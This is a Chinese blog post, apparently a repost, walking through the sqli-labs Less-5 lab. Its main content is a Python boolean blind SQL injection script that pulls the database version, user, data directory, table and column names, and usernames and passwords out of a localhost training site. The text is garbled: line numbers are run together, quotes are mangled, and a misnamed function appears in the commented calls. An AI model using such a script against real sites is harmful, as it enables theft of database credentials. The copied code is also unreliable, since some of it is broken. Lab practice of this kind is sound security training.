sqli-labs:5-,基於報錯的註入
阿新 • • 發佈:2019-03-24
asc rtb show inf blank span format alt orm 
思考1:當# --+都被過濾時,只能考慮閉合處理
思考2:union聯合註入時必須先判斷字段長度
eg. id=1‘ order by 3 and ‘1‘=‘1
sqli5:
首先判斷出對id經過了‘處理
其次發現結果不再回顯
ok那就盲註了,先判斷mysql版本,版本過低可優先考慮dns邊信道攻擊。
bool盲註的腳本
1 # -*- coding: utf-8 -*- 2 """ 3 Created on Sat Mar 23 16:03:43 2019 4 5 @author: kenshin 6 """bool型盲註腳本7 8 import requests,re 9 url = ‘http://localhost/sqli-labs/Less-5/?id=1‘ 10 pattern_mark = ‘You are in...........‘ 11 12 def get_version(url): 13 #mysql版本標準:x.x.xx 14 #假設lstsion長度為5 15 lst = [‘#‘ for x in range(0, 5)] 16 lst[1] = lst[3] = ‘.‘ 17 for i in (1,3,5,6): 18 for ii in range(48,58): 19 payload = "\‘ and ascii(substr((select version()),"+str(i)+",1))="+str(ii)+" --+" 20 url_new = url + payload 21 r = requests.get(url_new) 22 if(re.findall(pattern_mark,r.text)): 23 lst[i-1] = str(ii-48) 24 break 25 sr = ‘‘.join(lst) 26 print("the lstsion of mysql:"+sr) 27 28 def get_user(url): 29 #假設user()長度為15 30 lst = [‘#‘ for x in range(0,15)] 31 for i in range(1,16): 32 for ii in ‘qwertyuiopasdfghjklzxcvbnm1234567890_-@‘: 33 payload = "\‘ and substr((select user()),"+str(i)+",1)=‘"+ii+"‘ --+" 34 url_new = url + payload 35 r = requests.get(url_new) 36 if(re.findall(pattern_mark,r.text)): 37 lst[i-1] = ii 38 print(ii) 39 break 40 sr = ‘‘.join(lst) 41 print("the user of database: "+sr) 42 43 def get_datadir(url): 44 #假設@@datadir長度為32 45 lst = [‘#‘ for x in range(0,32)] 46 for i in range(1,33): 47 for ii in ‘:\\qwertyuiopasdfghjklzxcvbnm1234567890_-‘: 48 payload = "\‘ and substr((select @@datadir),"+str(i)+",1)=‘"+ii+"‘ --+" 49 url_new = url + payload 50 r = requests.get(url_new) 51 if(re.findall(pattern_mark,r.text)): 52 lst[i-1] = ii 53 print(ii) 54 break 55 sr = ‘‘.join(lst) 56 print(sr) 57 58 def get_currTB(url): 59 #假設當前數據庫最多有10個表[i標識] 60 for i in range(0,10): 61 #假設最長的表名長度為10[ii標識] 62 lst = [‘#‘ for x in range(0,10)] 63 for ii in range(1,11): 64 for iii in ‘qwertyuiopasdfghjklzxcvbnm1234567890_-#‘: 65 payload = "\‘ and substr((select * from information_schema.tables where table_schema=database() limit "+str(i)+",1),"+str(ii)+",1)=‘"+str(iii)+"‘ --+" 66 url_new = url + payload 67 r = requests.get(url_new) 68 if(re.findall(pattern_mark,r.text)): 69 lst[ii-1] = iii 70 print(iii) 71 break 72 if(lst[ii-1] == ‘#‘): 73 break 74 sr = ‘‘.join(lst) 75 print(sr) 76 77 def get_Column(url,tb): 78 #假設當前列最多有3個字段[i標識] 79 for i in range(0,3): 80 #假設每個字段最長的數據長度為10 81 lst = [‘#‘ for x in range(0,10)] 82 for ii in range(1,11): 83 for iii in ‘@qwertyuiopasdfghjklzxcvbnm1234567890_-#‘: 84 payload = "\‘ and substr((select column_name from information_schema.columns where table_name=‘"+tb+"‘ limit "+str(i)+",1),"+str(ii)+",1)=‘"+str(iii)+"‘ --+" 85 url_new = url + payload 86 r = requests.get(url_new) 87 if(re.findall(pattern_mark,r.text)): 88 lst[ii-1] = iii 89 print(iii) 90 break 91 if(lst[ii-1] == ‘#‘): 92 break 93 sr = ‘‘.join(lst) 94 print(sr) 95 def get_data(url): 96 #假設當前列有10條數據[i標識] 97 for i in range(1,11): 98 #假設每條數據最長的數據長度為25 99 lst = [‘#‘ for x in range(0,25)] 100 for ii in range(1,26): 101 for iii in ‘%@qwertyuiopasdfghjklzxcvbnm1234567890_-#‘: 102 #變量太多,payload一些變量在代碼端自行設置TT 103 payload = "‘ and substr((select group_concat(id,‘%‘,username,‘%‘,password) from security.users where id="+str(i)+"),"+str(ii)+",1)=‘"+str(iii)+"‘ --+" 104 url_new = url + payload 105 r = requests.get(url_new) 106 if(re.findall(pattern_mark,r.text)): 107 lst[ii-1] = iii 108 print(iii) 109 break 110 if(lst[ii-1] == ‘#‘): 111 break 112 sr = ‘‘.join(lst) 113 print(sr) 114 """ 115 dnslog 116 """ 117 118 119 #get_lstsion(url) 120 #get_user(url) 121 #get_datadir(url) 122 #get_currTB(url) 123 #tb = input("select table >> ") 124 #get_Column(url,tb) 125 get_data(url)
sqli-labs:5-,基於報錯的註入